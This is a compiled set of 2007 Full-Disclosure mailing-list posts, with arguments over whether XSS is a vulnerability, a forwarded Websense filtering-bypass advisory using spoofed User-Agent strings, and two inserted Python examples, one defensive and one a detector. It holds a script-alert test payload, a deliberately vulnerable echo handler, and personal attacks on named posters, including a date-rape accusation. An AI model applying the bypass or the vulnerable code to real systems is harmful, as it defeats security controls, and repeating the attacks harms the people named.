Re: [Full-disclosure] Full-Disclosure Digest, Vol 34, Issue 31

2007-12-13 Thread Kristian Erik Hermansen
On Dec 12, 2007 9:01 PM,  Andrew A [EMAIL PROTECTED] wrote:
 PPS-- Namedropping the head of a project you plagiarized from in your cover
 letter is not good policy. Especially in this industry. Its a smaller world
 than most, and now you're blackballed buddy. You'll work as desktop support
 at FOX forever. On this list you may act like the lack of credit was some
 sort of forgetful slip, but most people have been relayed by now that you
 directly claimed authorship of said shellcode in an interview.

Andrew, you certainly are misinformed.  I did not claim authorship for
anything, as you say.  I don't even know who this individual is that
you are talking about.  The only thing I can think of that you have
mentioned is something I put together for H D Moore and the metasploit
team to resolve the licensing issues for getting msf3 into Ubuntu's
multiverse repository.  You can see the full efforts of this, and some
of my code, at the link below...

https://bugs.launchpad.net/ubuntu/+bug/102212

Some stuff was sent to the msfdev list as well, so if you are on that
team, you would know.  All I wanted to do was clean up the msf3 code
to meet Debian package specifications.  However, it was not possible
to get msf3 into Debian/Ubuntu without violating the Metasploit
license.  H D did say they may rewrite the license in a future
version.  Even if I mentioned this msf3 effort during an interview,
and I don't even recall if I did, then your point is still moot.  I
tried to do something for the community of users who run msf on Linux,
which was make metasploit more accessible to them.  If you think
that's bad, then that's fine.

This whole discussion started with presenting the fact that the
favicon issue could be a useful attack vector that people may not have
thought of before.  I can't change the fact that people in the
security community will always be hostile.  There is something about
this community, and it doesn't happen like this anywhere else, where
people can be just so belligerent.  I try to have fun and have a good
time in/out of work, and maybe you don't know that about me.  I am
light-hearted and enjoy the company of my peers.  Ask anyone who has
had a drink with me, or even too many drinks!  We always have fun.
Even if I poke fun at people, it is usually in a fair way, showing
reason to feel that way.  Your attitude is based on things which are
made up, false, and you have no base to stand on with such hostility.
Just turn that frown upside-down and remember that life shouldn't be
so serious.  Take it easy and have fun.  It is not the end of the
world.  I will buy some beers to chill your hot head if you like...
-- 
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

2007-12-13 Thread Fredrick Diggle
http://www.google.com/search?q=%22Dude+VanWinkle%22+popsicle

Nice work Dude!

YAY!

On Dec 12, 2007 11:00 PM, Dude VanWinkle [EMAIL PROTECTED] wrote:

 BTW:
 http://www.google.com/search?hl=en&q=%22Fredrick+Diggle%22+%2B2003&btnG=Search

 Nice work Fred!

 On Dec 12, 2007 10:32 PM, Fredrick Diggle [EMAIL PROTECTED] wrote:
  Yes way to go MW you made his day! MW I understand how hard it is to
  turn things into viable exploits :(... sometimes the best move is just to
  wait for the metasploit guys to do it. They are elite at bof sploitin' etc.
  You should stick to the more interesting research like XSS and SQL tampering :
 
  also Dude, your pillow joke was damn hilarious :D how did you think of
  it? can you give me joke lessons?
 
 
  Maybe he will stuff a pillow in there in order to help curb the urge to
  give n3td3v repeated blowjobs on the hour, every hour..
  ^--- Comedy Platinum (better than gold)
 
  YAY!
 
 
 
 
 
  On Dec 12, 2007 8:38 PM, Dude VanWinkle [EMAIL PROTECTED] wrote:
 
  
  
  
   On Dec 12, 2007 3:38 AM, Morning Wood [EMAIL PROTECTED]  wrote:
    One of my first advisories and was rediscovered later, turned into a
    viable exploit 2 years after by another researcher.
   
   
 
 http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user
   
   
 
  http://metasploit.com:5/EXPLOITS?MODE=SELECT&MODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77
   
*hugz*
  
  
    Thanks for this MW. Made my freaking day (admittedly not hard to do,
    but still)
  
   I am sure now reepex (http://reepex.com) will learn from his mistake
   and stop being such a douchebag, and shut his mouth. Maybe he will
   stuff a pillow in there in order to help curb the urge to give n3td3v
   repeated blowjobs on the hour, every hour..
  
   If he feels like doing so, I know a great site to buy the pillows from
   (http://reepex.com)
  
   -JP
  
  
 
 


Re: [Full-disclosure] on xss and its technical merit

2007-12-13 Thread Jay
Saying XSS isn't a vulnerability is like saying a binary that has a buffer
overflow isn't vulnerable. XSS needs javascript, binary needs its own malcode
as well.

Every vulnerability needs a medium to be exploited.

Naysayers of XSS want some elegant exciting actions. It's not. It's a case of not
sanitizing input that allows arbitrary code to be executed. Simple things like
umm secure coding, url scan, mod_security, noscript could combat this easily.

It's like someone walking past a car and seeing a million dollars sitting in the
front seat. Thief opens unlocked door and takes money. Now a more elegant way
would be to manipulate the chemical composition of the glass back to a gaseous
form and reaching through. Either way the loot is gone.

I really don't understand why some in this community are so quick to say this is
no find, this isn't new, this is insert blah. I guess it makes them feel
intellectually superior to tear down the ideas of others whether they deserve
it or not. In some cases they do. Are members of this community so starved for
their own self worth that they strive to squash the ideas of others
instinctively? Would make for an interesting study.

Jay <script>alert('YAY!')</script>

- Original Message -
From: Fredrick Diggle [mailto:[EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Wed, 12 Dec 2007 13:17:18 -0600
Subject: Re: [Full-disclosure] on xss and its technical merit

Thank you info sec guru for your glowing review. Did you even read my post?
I think I explained quite succinctly why XSS is not a vulnerability. Do you
have some argument with what I posted or are you going to stick with
criticizing my tone? You win oh guru of the info sec industry thing.

<3 fredrick

YAY!

On Dec 12, 2007 12:57 PM, Jay [EMAIL PROTECTED] wrote:

 It's amazing the last 2 posters even have time to read FD. With all the
 super important super secret projects they must be working. They preface
 everything with I'm not going to put much thought into this then proceed to
 vomit a bunch of useless rhetoric throwing in how trivial it is and how much
 experience they have beating up 10 year olds or something.

 I actually think this thread should die as 1 side of the house believes
 XSS and XSRF are viable attack vectors. The other side thinks it's rubbish.

 So let it die and then all the folks who are so bored yawn with XSS and
 CSRF can post their remarkable works and amaze us all.

 Jay


 - Original Message -
 From: Fredrick Diggle [mailto:[EMAIL PROTECTED]
 To: full-disclosure@lists.grok.org.uk
 Sent: Wed, 12 Dec 2007 12:21:14 -0600
 Subject: Re: [Full-disclosure] on xss and its technical merit

 What no one seems to realize is that XSS by its very nature is not a
 vulnerability. It is a perfectly valid mechanism to aid in exploitation but
 can anyone cite me an example where xss in and of itself accomplishes
 anything? I can think of pretty much 3 examples of XSS (granted without
 giving it much thought because let's face it, it isn't worth much thought)

 1. You are taking something from a user which is accessible from the
 scripting language context of their browser.
  In this case the vulnerability is not XSS; the vulnerability is either
 that you (or the web browser) are storing something valuable in an insecure
 way. The most obvious example of this is something like session cookies which,
 if your auth/session management is implemented in a secure way, won't matter a
 bit. It follows that the vulnerability is not XSS but instead that some
 developer stored something valuable in a stupid way. All of the retards on
 the list will no doubt ask me for a secure session management schema but I
 am a firm believer that sharing is communism so screw you.

 2. You are forcing the user's browser to make a request and complete some
 task within the context of the application.
  In this case again the vulnerability is not XSS but instead that the
 application allows users to do important things without verifying who they
 are. This is request forgery not xss; xss is only the mechanism by which
 the exploit is carried out. So again xss is not a vulnerability.

 3. You are doing some other funkiness through the scripting language (all
 that crap about internal network scanning comes to mind)
  AGAIN this is not a vulnerability. If it is possible to do this crap
 through xss then it is also possible through any website the user visits.
 That means that if this crap is doable then you should report it to the
 guys who develop the scripting language backend and not some guy who doesn't
 sanitize things that he outputs. So once more the vulnerability is NOT xss,
 it is an issue with the scripting language.

 The only other case that you could make for this is ui defacement I guess
 but in that case the vuln is not xss but that the developer didn't
 properly separate user generated content from backend content to make it
 clear that the content in these areas 
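The argument in this thread splits one reflected-input bug into three components: the reflected output itself (what Jay calls "not sanitizing input"), the valuable thing that is reachable from the browser's scripting context (case 1), and the state-changing request that the application accepts without proof of origin (case 2). Each of those has its own server-side control. The Python below is an added example written for this page, not code posted by any participant in the thread; it uses no web framework, and the `greet`/`transfer` handlers, the cookie name `sid` and the HMAC-based CSRF token scheme are constructed for illustration.

```python
import hmac
import html
import secrets
from urllib.parse import parse_qs

# --- Reflected output: the part of the page that echoes user input ---

def greet_vulnerable(query_string: str) -> str:
    """Echo the 'name' parameter straight into HTML (the thread's XSS case)."""
    name = parse_qs(query_string).get("name", [""])[0]
    return f"<p>Hello {name}</p>"   # any markup in name is interpreted by the browser


def greet_fixed(query_string: str) -> str:
    """Same page, but user input is HTML-encoded before it reaches the browser."""
    name = parse_qs(query_string).get("name", [""])[0]
    return f"<p>Hello {html.escape(name, quote=True)}</p>"


# --- Case 1: keep the valuable thing out of the scripting-language context ---

def new_session_id() -> str:
    """A session id that is random rather than derived from anything guessable."""
    return secrets.token_urlsafe(32)


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie line for the session token (cookie name 'sid' is constructed).

    HttpOnly keeps document.cookie from returning the value, Secure keeps it
    off plaintext connections, SameSite=Lax stops the browser attaching it
    to most cross-site requests.
    """
    return f"Set-Cookie: sid={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


# --- Case 2: a state-changing action must prove it came from our own page ---

def csrf_token(server_secret: bytes, session_id: str) -> str:
    """Per-session token the server can recompute; the app embeds it in its forms."""
    return hmac.new(server_secret, session_id.encode(), "sha256").hexdigest()


def handle_transfer(form: dict, session_id: str, server_secret: bytes) -> tuple:
    """POST /transfer: refuse unless the form carries the token for this session.

    `form` is a parsed POST body in parse_qs shape: {"amount": ["10"], "csrf": [...]}
    """
    presented = form.get("csrf", [""])[0]
    expected = csrf_token(server_secret, session_id)
    if not hmac.compare_digest(presented, expected):
        return 403, "transfer refused: request did not originate from our form"
    amount = form.get("amount", ["0"])[0]
    return 200, f"transferred {amount}"


if __name__ == "__main__":
    # Constructed request: the thread's own signature string, URL-encoded.
    payload = "name=%3Cscript%3Ealert('YAY!')%3C/script%3E"
    print(greet_vulnerable(payload))
    print(greet_fixed(payload))

    sid = new_session_id()
    print(session_cookie_header(sid))

    secret = secrets.token_bytes(32)          # server-side secret, constructed here
    good = parse_qs(f"amount=10&csrf={csrf_token(secret, sid)}")
    print(handle_transfer(good, sid, secret))                 # (200, ...)
    print(handle_transfer(parse_qs("amount=10"), sid, secret))  # (403, ...) forged request
```

Run as a script it prints the raw and encoded greeting side by side, the cookie header, and one accepted and one refused transfer. Note that the encoded greeting still shows the attacker's text; it is simply no longer markup. The cookie flags and the CSRF check are what make the reflected input harmless even where encoding is missed, which is the point the thread circles around.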

Re: [Full-disclosure] on xss and its technical merit

2007-12-13 Thread Byron Sonne
 Naysayers of XSS want some elegant exciting actions.
 It's not. It's a case of not sanitizing input that allows
 arbitrary code to be executed. Simple things like umm
 secure coding, url scan, mod_security, noscript could
 combat this easily.

That is probably the largest part of what makes it such a boring topic.
The easier an attack is to defend against, probably the less exciting it
is. It's hardly exciting to 'break into' someone's house through an
unlocked door; there's no challenge.

 It's like someone walking past a car and seeing a million
 dollars sitting in the front seat. Thief opens unlocked
 door and takes money. Now a more elegant way would be
 to manipulate the chemical composition of the glass back
 to a gaseous form and reaching through.

Ah, now THAT would be cool :)

 I really don't understand why some in this community are
 so quick to say this is no find, this isn't new, this is
 insert blah.

You deal with this kind of crap professionally for a couple years and
then tell me how excited you are to come into work in the morning just
so you can pore over hours and hours of crud to make your customers
happy. It's boring. There's no meat to it. It's rote. It sucks the life
out of your day. I regret ever saying that nothing could be worse than
writing CGI checks.

 I guess it makes them feel intellectually
 superior to tear down the ideas of others whether they
 deserve it or not. In some cases they do.

That might be part of it, who knows, for myself or maybe others. I'm not
a shrink. But to me it's more about wanting to see the boundaries pushed
 and being exposed to new, exciting stuff.

 Are members of
 this community so starved for their own self worth that
 they strive to squash the ideas of others instinctively?
 Would make for an interesting study.

Would probably just show that there's a lot of pubescent teenagers
jockeying for social position.



Re: [Full-disclosure] on xss and its technical merit

2007-12-13 Thread Fredrick Diggle
Once again you completely fail at reading comprehension. Let me help.

1. Saying XSS isn't a vulnerability is like saying a binary that has a
buffer overflow isn't vulnerable.
  Wrong! An application coded in a way that allows a user to write data past
the end of the memory allocated for that data contains a flaw. An
application which outputs arbitrary user input does not contain a flaw. The
intended purpose was to output the user input verbatim and that is exactly
what the code does. If this functionality allows an attacker to in some way
gain something useful then the vulnerability exists in the component which
allowed this. I think that I covered the possibilities and their associated
components in my initial mail.

2. XSS needs javascript, binary needs its own malcode as well.
  Blatantly incorrect! XSS does not require javascript, it requires the
browser to interpret input rather than simply display it (this generally
means certain input is parsed and interpreted as a scripting language
(javascript is ONE scripting language and therefore NOT a requirement)).
Also what the heck is malcode? If you are implying that to exploit an
application which has been compiled into bytecode which can be directly
interpreted by the target architecture that I must introduce my own bytecode
into memory and force the processor to execute it then you are sorely
mistaken. It would depend greatly on the type of vulnerability, the context
in which the code is running, and the attacker's creativity. Also generally
people use the word shellcode but that is just semantics.

3. Every vulnerability needs a medium to be exploited.
  I guess if by medium you mean the ability to perceive and possibly (but
not necessarily) interact with the system in question. If code has a bug
which unintentionally sends users passwords to FD on the 3rd of every month
I suppose that wouldn't be a vulnerability by your definition?

4. Naysayers of XSS want some elegant exciting actions. It's not.
  Did I ever ask for elegance? I asked what the inherent vulnerability in
redisplaying user input is.

5. It's a case of not sanitizing input that allows arbitrary code to be
executed.
  arbitrary code? really?

6. Simple things like umm secure coding, url scan, mod_security, noscript
could combat this easily.
  I reference my initial suggestion that someone get busy building some
horribly complex way to make function pointers impossible to overwrite.
There is a lot of money to be made.

7. It's like someone walking past a car and seeing a million dollars sitting
in the front seat. Thief opens unlocked door and takes money. Now a more
elegant way would be to manipulate the chemical composition of the glass
back to a gaseous form and reaching through. Either way the loot is gone.
  No. I would agree that both of those examples are exploitation. I disagree
that either of them has anything to do with XSS however. In this situation
XSS would be the equivalent of following the owner to the bank where he
deposits it, dressing up as him and trying to get the bank to release his
money to you. The vulnerability would not be your ability to dress up as him
but the bank's stupidity in buying it.

8. I really don't understand why some in this community are so quick to say
this is no find, this isn't new, this is insert blah. I guess it makes them
feel intellectually superior to tear down the ideas of others whether they
deserve it or not. In some cases they do.
  Like you, now?

9. Are members of this community so starved for their own self worth that
they strive to squash the ideas of others instinctively? Would make for a
interesting study.
  Perhaps you should pursue this as security apparently isn't your niche :

10. Jay <script>alert('YAY!')</script>
  Are you the guy that has been releasing all that exploit code to
milw0rm? please stop you are clogging the pipes.

YAY!


On Dec 13, 2007 7:55 AM, Jay [EMAIL PROTECTED] wrote:

 Saying XSS isn't a vulnerability is like saying a binary that has a
 buffer overflow isn't vulnerable. XSS needs javascript, binary needs its
 own malcode as well.

 Every vulnerability needs a medium to be exploited.

 Naysayers of XSS want some elegant exciting actions. It's not. It's a case
 of not sanitizing input that allows arbitrary code to be executed. Simple
 things like umm secure coding, url scan, mod_security, noscript could combat
 this easily.

 It's like someone walking past a car and seeing a million dollars sitting
 in the front seat. Thief opens unlocked door and takes money. Now a more
 elegant way would be to manipulate the chemical composition of the glass
 back to a gaseous form and reaching through. Either way the loot is gone.

 I really don't understand why some in this community are so quick to say
 this is no find, this isn't new, this is insert blah. I guess it makes them
 feel intellectually superior to tear down the ideas of others whether they
 deserve it or not. In some cases they do. Are members of this 

Re: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass

2007-12-13 Thread Hubbard, Dan
An added note on this...

Customers do not need to download nor install any new patch for this
fix. It was automatically updated and installed with our nightly
protocol signature updates.







-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of The
Security Community
Sent: Wednesday, December 12, 2007 3:32 PM
To: [EMAIL PROTECTED]; Full-Disclosure
Subject: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass

Mr. HinkyDink would like to share the following with the Security
Community...

-- Forwarded message --
From:  [EMAIL PROTECTED]
Date: Dec 12, 2007 6:05 PM
Subject: Websense 6.3.1 Filtering Bypass
To: [EMAIL PROTECTED]



Please share this with your little friends...

--

Websense Policy Filtering Bypass

discovered by mrhinkydink


PRODUCT: Websense Enterprise 6.3.1

EXPOSURE: Web Filtering Bypass

SYNOPSIS


By spoofing the User-Agent header it is possible to bypass filtering and,
to a lesser extent, monitoring in a Websense Enterprise 6.3.1 environment.

PROOF OF CONCEPT


The following was tested in an unpatched 6.3.1 system using the ISA Server
integration product.  It is assumed it will work with other integration
products but this has not been tested.  Other User Agents may also work.

I.  Install FireFox 2.0.x

II. Obtain and install the User Agent Switcher browser plug-in by Chris
Pederick

III. Add the following User Agents to the plug-in

 Description: RealPlayer
 User Agent : RealPlayer G2

 Description: MSN Messenger
 User Agent : MSMSGS

 Description: WebEx
 User Agent : StoneHttpAgent

IV.  Change FireFox's User Agent to any one of the preceding values

V.   Browse to a filtered Web site

VI.  Content is allowed

Content browsed via this method will be recorded in the Websense database
as being in the Non-HTTP category.

Demonstration: http://www.youtube.com/watch?v=pKv41ge8XcQ

SEE ALSO

Websense KnowledgeBase article #976

The vendor acknowledges this behavior in the aforementioned article.

WORKAROUND
==
Disable the protocols mentioned above.

VENDOR RESPONSE
===
Websense has repaired this issue in database #92938

NOTICE
==
mrhinkydink is not to be confused with the blogger by the same name
at www.dailykos.com

c. MMVII mrhinkydink




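The advisory's own observation is the defender's hook: traffic that passes this way is logged under the Non-HTTP category, yet what a spoofed browser fetches is an HTML page, which is not RealPlayer, Messenger or WebEx behaviour. Pairing the category with the response content type separates a spoofed browser from the genuine protocol clients the category exists for. The Python below is an added example for this page, not Websense code and not anything from the advisory's author; the space-separated log layout and every sample line are constructed for the demonstration and do not reproduce the real Websense log schema.

```python
import re
from collections import Counter

# Constructed layout for this example (NOT the real Websense log schema):
# <timestamp> <client-ip> <category> <status> <content-type> "<user-agent>" <url>
SAMPLE_LOG = """\
2007-12-12T15:01:02 10.0.0.21 Search_Engines 200 text/html "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" http://www.example.com/
2007-12-12T15:01:09 10.0.0.21 Non-HTTP 200 text/html "RealPlayer G2" http://blocked.example.org/forum/index.php
2007-12-12T15:01:12 10.0.0.21 Non-HTTP 200 text/html "MSMSGS" http://blocked.example.org/forum/viewtopic.php?t=42
2007-12-12T15:02:30 10.0.0.77 Non-HTTP 200 audio/x-pn-realaudio "RealPlayer G2" http://media.example.net/stream.ra
2007-12-12T15:03:00 10.0.0.77 Non-HTTP 200 application/octet-stream "StoneHttpAgent" http://meeting.example.net/agent
this line is malformed and must be skipped, not crash the parser
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<category>\S+) (?P<status>\d{3}) '
    r'(?P<ctype>\S+) "(?P<ua>[^"]*)" (?P<url>\S+)$'
)

# User-Agent values the advisory names as passing the filter.
PROTOCOL_CLIENT_AGENTS = {"RealPlayer G2", "MSMSGS", "StoneHttpAgent"}

# Content a media player or messenger client has no business fetching.
BROWSER_CONTENT_TYPES = ("text/html", "application/xhtml+xml")


def parse_line(line: str):
    """Return a dict of fields, or None for lines that do not match the layout."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def is_bypass_candidate(entry: dict) -> bool:
    """Flag Non-HTTP traffic whose payload is a web page: a spoofed browser.

    Both conditions are required: the category alone also covers genuine
    streaming and messaging, and the content type alone covers ordinary browsing.
    """
    ctype = entry["ctype"].split(";")[0].lower()
    return entry["category"] == "Non-HTTP" and ctype.startswith(BROWSER_CONTENT_TYPES)


def find_bypass_candidates(log_text: str) -> list:
    """All parsed entries that look like filtering bypass via User-Agent."""
    entries = (parse_line(l) for l in log_text.splitlines() if l.strip())
    return [e for e in entries if e is not None and is_bypass_candidate(e)]


def clients_by_hits(log_text: str) -> Counter:
    """Flagged entries per client address, for triage ordering."""
    return Counter(e["client"] for e in find_bypass_candidates(log_text))


if __name__ == "__main__":
    for e in find_bypass_candidates(SAMPLE_LOG):
        known = "listed" if e["ua"] in PROTOCOL_CLIENT_AGENTS else "unlisted"
        print(f'{e["ts"]} {e["client"]} ua="{e["ua"]}" ({known}) -> {e["url"]}')
    print(clients_by_hits(SAMPLE_LOG))
```

On the sample, the two forum pages fetched under the RealPlayer and MSMSGS agents are flagged while the genuine audio stream and the octet-stream agent fetch are not. The check deliberately keys on the category/content-type mismatch rather than on the three agent strings, since the advisory itself says other User Agents may also work; the known list is only used to annotate the output.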


Re: [Full-disclosure] on xss and its technical merit

2007-12-13 Thread Fredrick Diggle
I can see how my explanation would make very little sense to someone with as
little technical ability as yourself. I feel badly as perhaps my antics have
threatened what you hope to one day turn into a career. Unfortunately I
think that you will find it difficult finding a job based solely on your
detailed technical knowledge of all things xss.

I have perused many careers on the monster dot com and after much perusal
have decided to stick with what I know.

To answer what I believe your question was intended to be I am currently
employed by the São Paulo Zoo, I work primarily with primates but have also
periodically been asked to brush the hippopotamus' teeth (a task which I do
not particularly enjoy as ).

You are rather stupid so don't be too hard on yourself for feeling that way.
I posted only one initial email on this topic and have merely responded to
others' attacks since then.

YAY!



On Dec 13, 2007 10:33 AM, pdp (architect) [EMAIL PROTECTED]
wrote:

 bravo :) this is the most senseless explanation I have ever seen, perhaps
 you should peruse a different career as well... I am not trying to be funny
 but I couldn't resist to write to you in person after seeing your email.
 Cheers and good luck.

 pdp

 P.S. btw, what do you do for a living? and btw, I feel stupid since it is
 more than obvious this conversation is made up and mainly between the same
 guy posting from different emails. so, please stop. it is getting really out
 of control and it is rather annoying.

 On Dec 13, 2007 3:36 PM, Fredrick Diggle [EMAIL PROTECTED] wrote:

  Once again you completely fail at reading comprehension. Let me help.
 
  1. Saying XSS isn't a vulnerability is like saying a binary that
  has a buffer overflow isn't vulnerable.
Wrong! An application coded in a way that allows a user to write data
  past the end of the memory allocated for that data contains a flaw. An
  application which outputs arbitrary user input does not contain a flaw. The
  intended purpose was to output the user input verbatim and that is exactly
  what the code does. If this functionality allows an attacker to in some way
  gain something useful then the vulnerability exists in the component which
  allowed this. I think that I covered the possibilities and their associated
  components in my initial mail.
 
  2. XSS needs javascript, binary needs its own malcode as well.
Blatantly incorrect! XSS does not require javascript, it requires the
  browser to interpret input rather than simply display it (this generally
  means certain input is parsed and interpreted as a scripting language
  (javascript is ONE scripting language and therefore NOT a requirement)).
  Also what the heck is malcode? If you are implying that to exploit an
  application which has been compiled into bytecode which can be directly
  interpreted by the target architecture that I must introduce my own bytecode
  into memory and force the processor to execute it then you are sorely
  mistaken. It would depend greatly on the type of vulnerability, the context
  in which the code is running, and the attacker's creativity. Also generally
  people use the word shellcode but that is just semantics.
 
   3. Every vulnerability needs a medium to be exploited.
I guess if by medium you mean the ability to perceive and possibly
  (but not necessarily) interact with the system in question. If code has a
  bug which unintentionally sends users passwords to FD on the 3rd of every
  month I suppose that wouldn't be a vulnerability by your definition?
 
  4. Naysayers of XSS want some elegant exciting actions. It's not.
Did I ever ask for elegance? I asked what the inherent vulnerability
  in redisplaying user input is.
 
  5. It's a case of not sanitizing input that allows arbitrary code to be
  executed.
arbitrary code? really?
 
  6. Simple things like umm secure coding, url scan, mod_security,
  noscript could combat this easily.
I reference my initial suggestion that someone get busy building some
  horribly complex way to make function pointers impossible to overwrite.
  There is a lot of money to be made.
 
  7. It's like someone walking past a car and seeing a million dollars
  sitting in the front seat. Thief opens unlocked door and takes money. Now a
  more elegant way would be to manipulate the chemical composition of the
  glass back to a gaseous form and reaching through. Either way the loot is
  gone.
No. I would agree that both of those examples are exploitation. I
  disagree that either of them has anything to do with XSS however. In this
  situation XSS would be the equivalent of following the owner to the bank
  where he deposits it, dressing up as him and trying to get the bank to
  release his money to you. The vulnerability would not be your ability to
  dress up as him but the bank's stupidity in buying it.
 
  8. I really don't understand why some in this community are so quick to
  say this is no find, this isn't new, this is insert 

Re: [Full-disclosure] on xss and its technical merit

2007-12-13 Thread Morning Wood
4. use xss to IFRAME or otherwise leverage a client exploit

imho this is by far worse than any of the other vectors mentioned



Re: [Full-disclosure] Full-Disclosure Digest, Vol 34, Issue 31

2007-12-13 Thread Andrew A
On Dec 13, 2007 12:10 AM, Kristian Erik Hermansen 
[EMAIL PROTECTED] wrote:

 Andrew, you certainly are misinformed.  I did not claim authorship for
 anything, as you say.

You have no credibility. You've been spewing lies and claims of shellcode
authorship in a bunch of interviews in San Francisco. I have heard from
multiple people about your claims in interviews. These people I have known
for years as solid reverse engineers and exploit developers. They have
worked for years in pentesting, vuln assessment and auditing, and -never
plagiarized the work of others-. You work as desktop support and insult your
employer in your shitty blog. The entire SF based infosec scene is fucking
laughing at your antics. Personally, I stopped laughing and can feel only
disgust at your very presence.


 This whole discussion started with presenting the fact that the
 favicon issue could be a useful attack vector that people may not have
 thought of before.  I can't change the fact that people in the
 security community will always be hostile.

No, this discussion started when you claimed that there was a gmail/google
bug, all accounts vulnerable. Let's run through the definition of web app
vulnerability for your vuln. Can you:
* Steal a cookie or otherwise execute privileged javascript on the target
while the user is logged in? -no-
* Perform privileged actions upon a user's account while they are logged
in? -no-
* Access private data, such as email content? -no-

You are a worthless fraud, a hype machine. This would be hilarious if you
were intelligent and trying to infuriate people, but instead you're hoping
someone reading this list will be dumb enough to hire you. Sorry, try again
Kristen. You're just setting yourself up to be the next n3td3v.



  Ask anyone who has
 had a drink with me, or even too many drinks!

Passionately bi-curious queer date rapist?


 Even if I poke fun at people, it is usually in a fair way, showing
 reason to feel that way.  Your attitude is based on things which are
 made up, false, and you have no base to stand on with such hostility.

I have every base to stand on when calling out a lying, plagiarizing fraud.

Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

2007-12-13 Thread Morning Wood
im so hurt now... you make me feel so small compared to your great worx 
MrReepass
stfu kthnx


- Original Message - 
From: reepex [EMAIL PROTECTED]
To: Morning Wood [EMAIL PROTECTED]; 
full-disclosure@lists.grok.org.uk
Sent: Wednesday, December 12, 2007 9:01 PM
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow 
Vulnerability


 wow that's quite impressive.. you couldn't exploit a basic overflow and two
 years later someone else did

 you must be quite proud. Did you tell your family and co workers about
 this great finding? I hear tipping point and idefense are hiring; you should
 forward them this set of emails.

 On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote:

 One of my first advisories and was rediscovered later, turned into a
 viable exploit 2 years after by another researcher.


 http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user


 http://metasploit.com:5/EXPLOITS?MODE=SELECT&MODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77

 *hugz*


 - Original Message -
 From: reepex [EMAIL PROTECTED]
 To: Morning Wood [EMAIL PROTECTED];
 full-disclosure@lists.grok.org.uk
 Sent: Tuesday, December 11, 2007 1:58 PM
 Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple
 Bufferoverflow
 Vulnerability


  are you serious?
 
 
 http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html
 
  I guess you are a 'brain dead india wannabe sec researcher' also?
 
 
  On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote:
 
  advisories like this are typical of brain dead India wannabe sec
  researchers
  nuff said
 
 
 


 



[Full-disclosure] Checkpoint security email

2007-12-13 Thread Michael Neal Vasquez
Does anyone have a direct email contact for Checkpoint / Security to report
a vulnerability?  I've gone through their portal, and attempted to create a
ticket but have received errors and not met with any success.

Thanks,
Mike

Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

2007-12-13 Thread reepex
so are you now admitting your vulnerability was worthless?

On Dec 13, 2007 12:02 PM, Morning Wood [EMAIL PROTECTED] wrote:

 im so hurt now... you make me feel so small compared to your great worx
 MrReepass
 stfu kthnx


 - Original Message -
 From: reepex [EMAIL PROTECTED]
 To: Morning Wood [EMAIL PROTECTED];
 full-disclosure@lists.grok.org.uk
 Sent: Wednesday, December 12, 2007 9:01 PM
 Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple
 Bufferoverflow
 Vulnerability


  wow that's quite impressive.. you couldn't exploit a basic overflow and
  two years later someone else did
 
  you must be quite proud. Did you tell your family and co workers about
  this great finding? I hear tipping point and idefense are hiring; you should
  forward them this set of emails.
 
  On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote:
 
  One of my first advisories and was rediscovered later, turned into a
  viable exploit 2 years after by another researcher.
 
 
 
 http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user
 
 
 
 http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77
 
  *hugz*
 
 
  - Original Message -
  From: reepex [EMAIL PROTECTED]
  To: Morning Wood [EMAIL PROTECTED];
  full-disclosure@lists.grok.org.uk
  Sent: Tuesday, December 11, 2007 1:58 PM
  Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple
  Bufferoverflow
  Vulnerability
 
 
   are you serious?
  
  
 
 http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html
  
   I guess you are a 'brain dead india wannabe sec researcher' also?
  
  
   On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote:
  
   advisories like this are typical of brain dead India wannabe sec
   researchers
   nuff said
  

Re: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass

2007-12-13 Thread reepex
automatic updates with notification? Silent patching? Microsoft tactics?

I also knew websense was a joke but now you have come to this?


On Dec 13, 2007 8:49 AM, Hubbard, Dan [EMAIL PROTECTED] wrote:

 An added note on this...

 Customers do not need to download nor install any new patch for this
 fix. It was automatically updated and installed with our nightly
 protocol signature updates.







 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of The
 Security Community
